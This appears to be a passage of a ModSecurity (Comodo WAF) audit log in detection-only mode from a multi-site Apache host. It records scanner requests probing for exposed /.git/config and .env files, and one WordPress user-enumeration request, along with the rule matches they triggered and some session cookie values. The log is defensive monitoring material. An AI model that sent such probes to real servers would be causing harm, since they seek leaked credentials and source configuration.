Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a7ae2521-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.23 Cache-Control: private, must-revalidate pragma: no-cache expires: -1 Set-Cookie: XSRF-TOKEN=eyJpdiI6IlJNeDFWemNPMVBYUXFWOWs2NklVVGc9PSIsInZhbHVlIjoiRS9HRFNuL3JZOENsZitKMllCZ2I1V0s5bEpDRHliUlZibTFBZThNNE5DL0VZeEExRkFDU21tTnB2OUIxaUxJSE8rL0hQRmVUQk1UR2hkVUlJc2M5MnkycjVOM1FQWCtKTDRFUmVnR1FoVFFaLytHbXlwSzJXQ0NIaDVsMmpXaWUiLCJtYWMiOiI2NWQ2OWIwY2Q3OGNkMWZkNTA1ZTRlYWUzY2FjYTdhNWEyNjZjZTE0NTg1M2VkNGEwOTAwNzYwMzRiMzUwNmQyIiwidGFnIjoiIn0%3D; expires=Thu, 24 Jul 2025 04:36:11 GMT; Max-Age=7200; path=/; samesite=lax Set-Cookie: raqmix_hrm_session=eyJpdiI6IjVWU3UzeDF5ZVZ6QkdibXJzdDNKZFE9PSIsInZhbHVlIjoielhCSDY1cm04RTNONFVtTi94b2xNY0NiOXNPWGtVUHBESnQwTXZMdldlRnRIblVIbFNFOWlJL3pnbHYrMExib0YvMnY3dU9ndjJWaEo5UTJldTRyTk56RXdKZ1pzTmdPbk1vVnp6akpRRStMaWhMUGw1MWs5MjNqSHFTbzRHVkEiLCJtYWMiOiJiMWU5MTNmYzRiZDRhYmFjMGUwMGE5NzQyYzA4NTA2MGQwYzYwYjJhNDI5ODQ5NWM5MTA0M2Y2MWFiZmM3ODgyIiwidGFnIjoiIn0%3D; expires=Thu, 24 Jul 2025 04:36:11 GMT; Max-Age=7200; path=/; httponly; samesite=lax Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1181 Content-Type: text/html; charset=UTF-8 --a7ae2521-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "hrmdemo.raqmix.cloud"] [uri "/.git/config"] [unique_id "aIGcF0dutIOpb_kg22h7OAAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/hrmdemo.raqmix.cloud/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753324567858741 3353232 (- - -) Stopwatch2: 1753324567858741 3353232; combined=45240, p1=43269, p2=1856, p3=0, p4=0, p5=115, sr=252, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a7ae2521-Z-- --fe029926-A-- [24/Jul/2025:05:40:22.539321 +0300] aIGdFlooLYw4or2LgWKbFgAAAMA 185.177.72.9 42578 127.0.0.1 7081 --fe029926-B-- GET /.git/config HTTP/1.0 Host: moh.raqmix.net X-Real-IP: 185.177.72.9 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fe029926-F-- HTTP/1.1 503 Service Unavailable Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 29 Dec 2024 19:09:32 GMT ETag: "396-62a6d6f9f709e" Accept-Ranges: bytes Content-Length: 918 Content-Type: text/html --fe029926-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "moh.raqmix.net"] [uri "/.git/config"] [unique_id "aIGdFlooLYw4or2LgWKbFgAAAMA"] Stopwatch: 1753324822537922 1551 (- - -) Stopwatch2: 1753324822537922 1551; combined=782, p1=653, p2=0, p3=0, p4=0, p5=128, sr=197, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fe029926-Z-- --b6d2da67-A-- [24/Jul/2025:05:40:58.208940 +0300] aIGdOVooLYw4or2LgWKclwAAANc 195.178.110.161 45848 127.0.0.1 7081 --b6d2da67-B-- GET /.env HTTP/1.0 Host: testpos.raqmix.net X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --b6d2da67-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --b6d2da67-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "testpos.raqmix.net"] [uri "/.env"] [unique_id "aIGdOVooLYw4or2LgWKclwAAANc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/testpos.raqmix.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753324857856149 352960 (- - -) Stopwatch2: 1753324857856149 352960; combined=2746, p1=651, p2=1968, p3=0, p4=0, p5=126, sr=136, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b6d2da67-Z-- --19f64a29-A-- [24/Jul/2025:05:40:58.801760 +0300] aIGdOkdutIOpb_kg22h_kAAAABQ 195.178.110.161 45970 127.0.0.1 7081 --19f64a29-B-- GET /.env.save HTTP/1.0 Host: testpos.raqmix.net X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --19f64a29-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --19f64a29-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "testpos.raqmix.net"] [uri "/.env.save"] [unique_id "aIGdOkdutIOpb_kg22h_kAAAABQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/testpos.raqmix.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753324858549817 252158 (- - -) Stopwatch2: 1753324858549817 252158; combined=4013, p1=540, p2=3323, p3=0, p4=0, p5=149, sr=148, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --19f64a29-Z-- --2ba7a556-A-- [24/Jul/2025:05:40:59.417658 +0300] aIGdO1ooLYw4or2LgWKcqAAAAMU 195.178.110.161 46036 127.0.0.1 7081 --2ba7a556-B-- GET /.env.prod HTTP/1.0 Host: testpos.raqmix.net X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --2ba7a556-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --2ba7a556-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "testpos.raqmix.net"] [uri "/.env.prod"] [unique_id "aIGdO1ooLYw4or2LgWKcqAAAAMU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/testpos.raqmix.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753324859178525 239227 (- - -) Stopwatch2: 1753324859178525 239227; combined=2484, p1=534, p2=1822, p3=0, p4=0, p5=127, sr=139, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2ba7a556-Z-- --c8a4f547-A-- [24/Jul/2025:05:41:00.182524 +0300] aIGdO1ooLYw4or2LgWKcsAAAANA 195.178.110.161 46124 127.0.0.1 7081 --c8a4f547-B-- GET /api/.env HTTP/1.0 Host: testpos.raqmix.net X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --c8a4f547-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Access-Control-Allow-Origin: * Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --c8a4f547-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "testpos.raqmix.net"] [uri "/api/.env"] [unique_id "aIGdO1ooLYw4or2LgWKcsAAAANA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/testpos.raqmix.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753324859884049 298587 (- - -) Stopwatch2: 1753324859884049 298587; combined=2784, p1=478, p2=2200, p3=0, p4=0, p5=105, sr=149, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c8a4f547-Z-- --6f14d46b-A-- [24/Jul/2025:05:41:00.778489 +0300] aIGdPFooLYw4or2LgWKcuAAAAMM 195.178.110.161 46210 127.0.0.1 7081 --6f14d46b-B-- GET /dev/.env HTTP/1.0 Host: testpos.raqmix.net X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --6f14d46b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --6f14d46b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "testpos.raqmix.net"] [uri "/dev/.env"] [unique_id "aIGdPFooLYw4or2LgWKcuAAAAMM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/testpos.raqmix.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753324860512231 266398 (- - -) Stopwatch2: 1753324860512231 266398; combined=3181, p1=884, p2=2130, p3=0, p4=0, p5=167, sr=181, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6f14d46b-Z-- --d61a057b-A-- [24/Jul/2025:05:41:01.232347 +0300] aIGdPVooLYw4or2LgWKcwAAAAMA 185.177.72.144 46330 127.0.0.1 7081 --d61a057b-B-- GET /.git/config HTTP/1.0 Host: verozone.md X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d61a057b-F-- HTTP/1.1 200 OK Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 7293 Content-Type: text/html; charset=UTF-8 --d61a057b-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "verozone.md"] [uri "/.git/config"] [unique_id "aIGdPVooLYw4or2LgWKcwAAAAMA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/verozone.md/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753324861204353 28060 (- - -) Stopwatch2: 1753324861204353 28060; combined=2519, p1=600, p2=1819, p3=0, p4=0, p5=99, sr=201, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d61a057b-Z-- --ae4d473f-A-- [24/Jul/2025:05:44:47.010309 +0300] aIGeHkdutIOpb_kg22iDNQAAAAU 185.177.72.9 33896 127.0.0.1 7081 --ae4d473f-B-- GET /.git/config HTTP/1.0 Host: rorobeauty.raqmix.cloud X-Real-IP: 185.177.72.9 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ae4d473f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --ae4d473f-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "rorobeauty.raqmix.cloud"] [uri "/.git/config"] [unique_id "aIGeHkdutIOpb_kg22iDNQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rorobeauty.raqmix.cloud/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753325086684749 325674 (- - -) Stopwatch2: 1753325086684749 325674; combined=2247, p1=488, p2=1635, p3=0, p4=0, p5=123, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ae4d473f-Z-- --20f1ea01-A-- [24/Jul/2025:05:46:41.035208 +0300] aIGekVooLYw4or2LgWKmtQAAAMk 185.177.72.9 46546 127.0.0.1 7081 --20f1ea01-B-- GET /.git/config HTTP/1.0 Host: soor.raqmix.net X-Real-IP: 185.177.72.9 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --20f1ea01-F-- HTTP/1.1 503 Service Unavailable Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 29 Dec 2024 19:09:32 GMT ETag: "396-62a6d6f9f709e" Accept-Ranges: bytes Content-Length: 918 Content-Type: text/html --20f1ea01-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "soor.raqmix.net"] [uri "/.git/config"] [unique_id "aIGekVooLYw4or2LgWKmtQAAAMk"] Stopwatch: 1753325201033756 1584 (- - -) Stopwatch2: 1753325201033756 1584; combined=737, p1=654, p2=0, p3=0, p4=0, p5=83, sr=173, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --20f1ea01-Z-- --09e6ce27-A-- [24/Jul/2025:05:50:37.037489 +0300] aIGffFooLYw4or2LgWKt7wAAANc 185.177.72.9 53586 127.0.0.1 7081 --09e6ce27-B-- GET /.git/config HTTP/1.0 Host: web.raqmix.net X-Real-IP: 185.177.72.9 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --09e6ce27-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Set-Cookie: XSRF-TOKEN=eyJpdiI6ImVCRmFUeld0YmhIeUR5UUFrNld0ZVE9PSIsInZhbHVlIjoiMXEyR0NoVjBWQ2dTSnkxY3ExYTI0ekR0Y2JoclgxRnNsV2I5VlJhWUlqYWtzNFRrOTR6cXBadkJ0bnFiR3RIVVFJUTBkSS9TMEpoTHlGNnR4bnJBc29NMGRTRWpCcnQ3L3Q3NDQ4QUQ1c2NnYmQ3UHMrUXg3SGJsb25yYVVWazkiLCJtYWMiOiI5MGVjNGM5ODE2ZWIxMWFhMzAwZGM3YTEzZGVmZTUyN2QwNmEwZTUxMDRjMjZiODZlNDMyZGIxNzNkMzNlYjA5IiwidGFnIjoiIn0%3D; expires=Thu, 24 Jul 2025 04:50:37 GMT; Max-Age=7200; path=/ Set-Cookie: raqweb_session=eyJpdiI6IkVIa1dUd1oyam1sK2lBdFlCdnZqZ1E9PSIsInZhbHVlIjoiUWVrU294cEpQcXdiVTZCUG5zc3JibmNhVzRxTHFWVGJvdGxlQ0gyM1RiMm5vYjhhd08zeGU1bTlxZkwyMW5hMlVpUjdJeUIxVXYydmRVSUo0dnA5b0xRQ2ZmNUJOd3ZNQ1phWjN5RW1SbG9nb3pkYWp5dVZYODN4S0ZnU0JBVTgiLCJtYWMiOiI2ZTM3OTU4MmMxYWI3ZjRlNmMwMzhjYjY5MDFlNDAzYTM2YjM4MjE5MjE4OTMwOTNlZThlYzEyODgyMDZlNTIwIiwidGFnIjoiIn0%3D; expires=Thu, 24 Jul 2025 04:50:37 GMT; Max-Age=7200; path=/; httponly Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --09e6ce27-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "web.raqmix.net"] [uri "/.git/config"] [unique_id "aIGffFooLYw4or2LgWKt7wAAANc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/web.raqmix.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753325436908431 129259 (- - -) Stopwatch2: 1753325436908431 129259; combined=2446, p1=526, p2=1835, p3=0, p4=0, p5=84, sr=143, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --09e6ce27-Z-- --77c7956c-A-- [24/Jul/2025:05:57:28.132657 +0300] aIGhFlooLYw4or2LgWK8dQAAANM 34.9.12.232 56446 127.0.0.1 7081 --77c7956c-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: opalparis.store X-Real-IP: 34.9.12.232 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --77c7956c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.23 X-Robots-Tag: noindex Link: <https://opalparis.store/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 2 X-WP-TotalPages: 1 Allow: GET Vary: Origin Upgrade: h2,h2c Connection: Upgrade, close Content-Type: application/json; charset=UTF-8 --77c7956c-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||opalparis.store|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||opalparis.store|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "opalparis.store"] [uri "/wp-json/wp/v2/users/"] [unique_id "aIGhFlooLYw4or2LgWK8dQAAANM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/opalparis.store/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753325846094010 2038945 (- - -) Stopwatch2: 1753325846094010 2038945; combined=3918, p1=743, p2=3034, p3=0, p4=0, p5=140, sr=163, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --77c7956c-Z-- --c8795e7e-A-- [24/Jul/2025:06:12:23.757869 +0300] aIGkl1ooLYw4or2LgWLa5gAAAMo 78.153.140.179 39622 127.0.0.1 7081 --c8795e7e-B-- GET /.env HTTP/1.0 Host: 41.128.143.88 X-Real-IP: 78.153.140.179 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 5.1; A1601 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36 --c8795e7e-F-- HTTP/1.1 421 Misdirected Request Content-Length: 386 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8795e7e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.88"] [uri "/.env"] [unique_id "aIGkl1ooLYw4or2LgWLa5gAAAMo"] Apache-Error: [file "ssl_engine_kernel.c"] [line 325] [level 3] AH02032: Hostname default-41_128_143_86 (default host as no SNI was provided) and hostname 41.128.143.88 provided via HTTP have no compatible SSL setup Stopwatch: 1753326743756764 1206 (- - -) Stopwatch2: 1753326743756764 1206; combined=696, p1=562, p2=0, p3=31, p4=32, p5=71, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c8795e7e-Z-- --af687d51-A-- [24/Jul/2025:06:12:25.055367 +0300] aIGkmVooLYw4or2LgWLa6QAAANE 78.153.140.179 39702 127.0.0.1 7081 --af687d51-B-- GET /api/.env HTTP/1.0 Host: 41.128.143.88 X-Real-IP: 78.153.140.179 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 --af687d51-F-- HTTP/1.1 421 Misdirected Request Content-Length: 386 Connection: close Content-Type: text/html; charset=iso-8859-1 --af687d51-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.88"] [uri "/api/.env"] [unique_id "aIGkmVooLYw4or2LgWLa6QAAANE"] Apache-Error: [file "ssl_engine_kernel.c"] [line 325] [level 3] AH02032: Hostname default-41_128_143_86 (default host as no SNI was provided) and hostname 41.128.143.88 provided via HTTP have no compatible SSL setup Stopwatch: 1753326745053871 1584 (- - -) Stopwatch2: 1753326745053871 1584; combined=847, p1=697, p2=0, p3=31, p4=32, p5=87, sr=167, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --af687d51-Z-- --96ddd402-A-- [24/Jul/2025:06:12:26.644323 +0300] 